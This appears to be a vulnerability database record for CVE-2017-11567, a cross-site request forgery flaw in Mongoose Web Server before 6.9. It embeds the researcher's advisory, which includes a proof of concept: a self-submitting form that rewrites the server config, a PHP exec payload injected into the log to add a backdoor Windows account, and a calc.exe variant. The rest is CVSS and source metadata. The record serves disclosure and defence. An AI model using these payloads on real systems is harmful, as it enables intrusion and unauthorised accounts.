var-201709-1035
Vulnerability from variot
Cross-site request forgery (CSRF) vulnerability in Mongoose Web Server before 6.9 allows remote attackers to hijack the authentication of users for requests that modify Mongoose.conf via a request to __mg_admin?save. NOTE: this issue can be leveraged to execute arbitrary code remotely. Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible. Mongoose Web Server prior to 6.9 are vulnerable. It is a multi-protocol embedded networking library with functions including TCP, HTTP client and server, WebSocket client and server, MQTT client and broker and much more. However, IF Mongoose web server is installed as service then executing programs e.g. "calc.exe" may at times crash or fail to appear, but you may see it in Windows taskmgr.exe. Therefore, from my tests commands may become unstable when Mongoose is run as a service.
When Mongoose is run standard mode attackers can potentially modify "Mongoose.conf" and create arbitrary files on server like .PHP etc. to point Mongoose to this as its new "index" file. Then you need to tell Mongoose its "access_log_file" is the new attacker generated file, after injecting commands into Mongoose web servers log file that will get excuted when log file is later requested.
This vulnerability requires CGI interpreter to be already set or some information about the target is known like the CGI path and language "pl,php,cgi" used, so when we can set to use correct programming language when file is created during initial CRSF attack.
Note: If running commands with arguments, we have to use "\t" tab chars as using space will break our TELNET based code injection to the server log.
e.g.
GET<?php exec("cmd.exe\t/c\tnet\tuser\tHACKER\tabc123\t/add");?> HTTP/1.1
OR just TELNET to Mongoose web server, inject arbitrary commands, then call exec by making another TELNET HTTP GET.
For detailed description of every option, visit
https://github.com/cesanta/Mongoose
Lines starting with '#' and empty lines are ignored.
To make a change, remove leading '#', modify option's value,
save this file and then restart Mongoose.
access_control_list
access_log_file C:\Mongoose.access.php <======= BOOM
auth_domain mydomain.com
cgi_interpreter c:\xampp\php\php.exe <====== MUST BE SET
cgi_pattern .cgi$|.pl$|**.php$
dav_auth_file
dav_root
debug 0
document_root C:\
enable_directory_listing yes
error_log_file
extra_headers
extra_mime_types
global_auth_file
hide_files_patterns
hexdump_file
index_files Mongoose.access.php <======== BOOM
listening_port 8080
run_as_user
ssi_pattern .shtml$|.shtm$
ssl_certificate
ssl_ca_certificate
start_browser yes
url_rewrites
Mongoose log file Command Inject to create backdoor.
2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin 200 5234 - 2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin 200 5234 - 2017-07-24 03:12:30 - 127.0.0.1 - GET<?php exec("cmd.exe\t/c\tnet\tuser\tHACKER\tabc123\t/add");?> 400 0 - 2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin 200 5234 - 2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin?get_settings 200 4294967295 http://127.0.0.1:8080/__mg_admin 2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin?get_cfg_file_status 200 4294967295 http://127.0.0.1:8080/__mg_admin 2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /favicon.ico 404 0 -
Tested Windows 7.
Exploit/POC:
1) add backdoor account POC.
2) TELNET x.x.x.x 8080 GET<?php exec("cmd.exe\t/c\tnet\tuser\tHACKER\tabc123\t/add");?> HTTP/1.1
Enter
Enter
TELNET x.x.x.x 8080 GET / HTTP/1.1
Enter
Enter
Done, backdoor added!
====================
1) run calc.exe POC.
2) TELNET x.x.x.x 8080 GET / HTTP/1.1
Enter
Enter
Network Access:
Remote
Severity:
Medium
Disclosure Timeline:
Vendor Notification: July 23, 2017 Vendor Notification: July 28, 2017 Vendor Acknowledgement: July 31, 2017 Vendor Fixed released version 6.9 : September 4, 2017 September 4, 2017 : Public Disclosure
[+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c).
hyp3rlinx
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201709-1035",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "mongoose embedded web server library",
"scope": "lte",
"trust": 1.0,
"vendor": "cesanta",
"version": "6.8"
},
{
"model": "mongoose embedded web server and networking library",
"scope": "lt",
"trust": 0.8,
"vendor": "cesanta",
"version": "6.9"
},
{
"model": "mongoose embedded web server library",
"scope": "eq",
"trust": 0.6,
"vendor": "cesanta",
"version": "6.8"
},
{
"model": "mongoose web server",
"scope": "eq",
"trust": 0.3,
"vendor": "cesanta",
"version": "6.5"
},
{
"model": "mongoose web server",
"scope": "ne",
"trust": 0.3,
"vendor": "cesanta",
"version": "6.9"
}
],
"sources": [
{
"db": "BID",
"id": "100830"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008002"
},
{
"db": "NVD",
"id": "CVE-2017-11567"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1029"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:cesanta:mongoose_embedded_web_server_library:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "6.8",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-11567"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "John Page AKA hyp3rlinx.",
"sources": [
{
"db": "BID",
"id": "100830"
}
],
"trust": 0.3
},
"cve": "CVE-2017-11567",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2017-11567",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-11567",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-11567",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201707-1029",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008002"
},
{
"db": "NVD",
"id": "CVE-2017-11567"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1029"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross-site request forgery (CSRF) vulnerability in Mongoose Web Server before 6.9 allows remote attackers to hijack the authentication of users for requests that modify Mongoose.conf via a request to __mg_admin?save. NOTE: this issue can be leveraged to execute arbitrary code remotely. \nExploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible. \nMongoose Web Server prior to 6.9 are vulnerable. It is a multi-protocol embedded networking library\nwith functions including TCP, HTTP client and server, WebSocket client and server, MQTT client and broker and much more. However, IF Mongoose web server is installed as service then\nexecuting programs e.g. \"calc.exe\" may at times crash or fail to appear, but you may see it in Windows taskmgr.exe. \nTherefore, from my tests commands may become unstable when Mongoose is run as a service. \n\nWhen Mongoose is run standard mode attackers can potentially modify \"Mongoose.conf\" and create arbitrary files on server like .PHP etc. \nto point Mongoose to this as its new \"index\" file. Then you need to tell Mongoose its \"access_log_file\" is the new attacker generated\nfile, after injecting commands into Mongoose web servers log file that will get excuted when log file is later requested. \n\nThis vulnerability requires CGI interpreter to be already set or some information about the target is known like the CGI path and language\n\"pl,php,cgi\" used, so when we can set to use correct programming language when file is created during initial CRSF attack. \n\nNote: If running commands with arguments, we have to use \"\\t\" tab chars as using space will break our TELNET based code injection\nto the server log. \n\ne.g. \n\nGET\u003c?php exec(\"cmd.exe\\t/c\\tnet\\tuser\\tHACKER\\tabc123\\t/add\");?\u003e HTTP/1.1\n\nOR just TELNET to Mongoose web server, inject arbitrary commands, then call exec by making another TELNET HTTP GET. \n# For detailed description of every option, visit\n# https://github.com/cesanta/Mongoose\n# Lines starting with \u0027#\u0027 and empty lines are ignored. \n# To make a change, remove leading \u0027#\u0027, modify option\u0027s value,\n# save this file and then restart Mongoose. \n\n# access_control_list \naccess_log_file C:\\Mongoose.access.php \u003c======= BOOM\n# auth_domain mydomain.com\ncgi_interpreter c:\\xampp\\php\\php.exe \u003c====== MUST BE SET\n# cgi_pattern **.cgi$|**.pl$|**.php$\n# dav_auth_file \n# dav_root \n# debug 0\ndocument_root C:\\\n# enable_directory_listing yes\n# error_log_file \n# extra_headers \n# extra_mime_types \n# global_auth_file \n# hide_files_patterns \n# hexdump_file \nindex_files Mongoose.access.php \u003c======== BOOM\n# listening_port 8080\n# run_as_user \n# ssi_pattern **.shtml$|**.shtm$\n# ssl_certificate \n# ssl_ca_certificate \n# start_browser yes\n# url_rewrites\n\n\n\nMongoose log file Command Inject to create backdoor. \n-----------------------------------------------------------\n\n2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin 200 5234 -\n2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin 200 5234 -\n2017-07-24 03:12:30 - 127.0.0.1 - GET\u003c?php exec(\"cmd.exe\\t/c\\tnet\\tuser\\tHACKER\\tabc123\\t/add\");?\u003e 400 0 -\n2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin 200 5234 -\n2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin?get_settings 200 4294967295 http://127.0.0.1:8080/__mg_admin\n2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin?get_cfg_file_status 200 4294967295 http://127.0.0.1:8080/__mg_admin\n2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /favicon.ico 404 0 -\n \n\nTested Windows 7. \n\n\n\nExploit/POC:\n=============\n\n1) add backdoor account POC. \n\n\u003cform action=\"http://127.0.0.1:8080/__mg_admin?save\" method=\"post\"\u003e\n\u003cinput type=\"hidden\" name=\"access_log_file\" value=\"Mongoose.access.php\"\u003e\n\u003cinput type=\"hidden\" name=\"cgi_pattern\" value=\"**.cgi$|**.pl$|**.php\"\u003e\n\u003cinput type=\"hidden\" name=\"index_files\" value=\"Mongoose.access.php\"\u003e\n\u003cinput type=\"hidden\" name=\"cgi_interpreter\" value=\"c:\\xampp\\php\\php.exe\"\u003e\n\u003cscript\u003edocument.forms[0].submit()\u003c/script\u003e\n\u003c/form\u003e\n\n\n2) TELNET x.x.x.x 8080\nGET\u003c?php exec(\"cmd.exe\\t/c\\tnet\\tuser\\tHACKER\\tabc123\\t/add\");?\u003e HTTP/1.1\n\nEnter\n\nEnter\n\nTELNET x.x.x.x 8080\nGET / HTTP/1.1\n\nEnter\n\nEnter\n\nDone, backdoor added!\n\n\n====================\n\n1) run calc.exe POC. \n\n\u003cform action=\"http://127.0.0.1:8080/__mg_admin?save\" method=\"post\"\u003e\n\u003cinput type=\"hidden\" name=\"cgi_pattern\" value=\"**.cgi$|**.pl$|**.exe\"\u003e\n\u003cinput type=\"hidden\" name=\"index_files\" value=\"../../../../../../Windows/system32/calc.exe\"\u003e\n\u003cinput type=\"hidden\" name=\"cgi_interpreter\" value=\"../../../../../../Windows/system32/calc.exe\"\u003e\n\u003cscript\u003edocument.forms[0].submit()\u003c/script\u003e\n\u003c/form\u003e\n\n2) TELNET x.x.x.x 8080\nGET / HTTP/1.1\n\nEnter\n\nEnter\n\n\n\nNetwork Access:\n===============\nRemote\n\n\n\nSeverity:\n=========\nMedium\n\n\n\nDisclosure Timeline:\n=================================\nVendor Notification: July 23, 2017\nVendor Notification: July 28, 2017\nVendor Acknowledgement: July 31, 2017\nVendor Fixed released version 6.9 : September 4, 2017\nSeptember 4, 2017 : Public Disclosure\n\n\n\n[+] Disclaimer\nThe information contained within this advisory is supplied \"as-is\" with no warranties or guarantees of fitness of use or otherwise. \nPermission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and\nthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit\nis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility\nfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information\nor exploits by the author or elsewhere. All content (c). \n\nhyp3rlinx\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-11567"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008002"
},
{
"db": "BID",
"id": "100830"
},
{
"db": "PACKETSTORM",
"id": "144011"
}
],
"trust": 1.98
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-11567",
"trust": 2.8
},
{
"db": "EXPLOIT-DB",
"id": "42614",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008002",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1029",
"trust": 0.6
},
{
"db": "BID",
"id": "100830",
"trust": 0.3
},
{
"db": "PACKETSTORM",
"id": "144011",
"trust": 0.1
}
],
"sources": [
{
"db": "BID",
"id": "100830"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008002"
},
{
"db": "PACKETSTORM",
"id": "144011"
},
{
"db": "NVD",
"id": "CVE-2017-11567"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1029"
}
]
},
"id": "VAR-201709-1035",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.25
},
"last_update_date": "2023-12-18T13:19:20.941000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://cesanta.com/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008002"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008002"
},
{
"db": "NVD",
"id": "CVE-2017-11567"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.7,
"url": "http://seclists.org/fulldisclosure/2017/sep/3"
},
{
"trust": 2.0,
"url": "http://hyp3rlinx.altervista.org/advisories/mongoose-web-server-v6.5-csrf-command-execution.txt"
},
{
"trust": 1.0,
"url": "https://www.exploit-db.com/exploits/42614/"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-11567"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-11567"
},
{
"trust": 0.3,
"url": "https://www.cesanta.com/"
},
{
"trust": 0.1,
"url": "https://cesanta.com/binary.html"
},
{
"trust": 0.1,
"url": "http://127.0.0.1:8080/__mg_admin?save\""
},
{
"trust": 0.1,
"url": "https://github.com/cesanta/mongoose"
},
{
"trust": 0.1,
"url": "https://www.cesanta.com"
},
{
"trust": 0.1,
"url": "http://127.0.0.1:8080/__mg_admin"
}
],
"sources": [
{
"db": "BID",
"id": "100830"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008002"
},
{
"db": "PACKETSTORM",
"id": "144011"
},
{
"db": "NVD",
"id": "CVE-2017-11567"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1029"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "100830"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008002"
},
{
"db": "PACKETSTORM",
"id": "144011"
},
{
"db": "NVD",
"id": "CVE-2017-11567"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1029"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-09-07T00:00:00",
"db": "BID",
"id": "100830"
},
{
"date": "2017-10-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008002"
},
{
"date": "2017-09-05T13:27:04",
"db": "PACKETSTORM",
"id": "144011"
},
{
"date": "2017-09-07T13:29:00.357000",
"db": "NVD",
"id": "CVE-2017-11567"
},
{
"date": "2017-07-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201707-1029"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-09-07T00:00:00",
"db": "BID",
"id": "100830"
},
{
"date": "2017-10-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008002"
},
{
"date": "2017-09-18T17:43:24.343000",
"db": "NVD",
"id": "CVE-2017-11567"
},
{
"date": "2017-09-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201707-1029"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "144011"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1029"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Mongoose Web Server Vulnerable to cross-site request forgery",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008002"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201707-1029"
}
],
"trust": 0.6
}
}
Loading...
Loading...
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.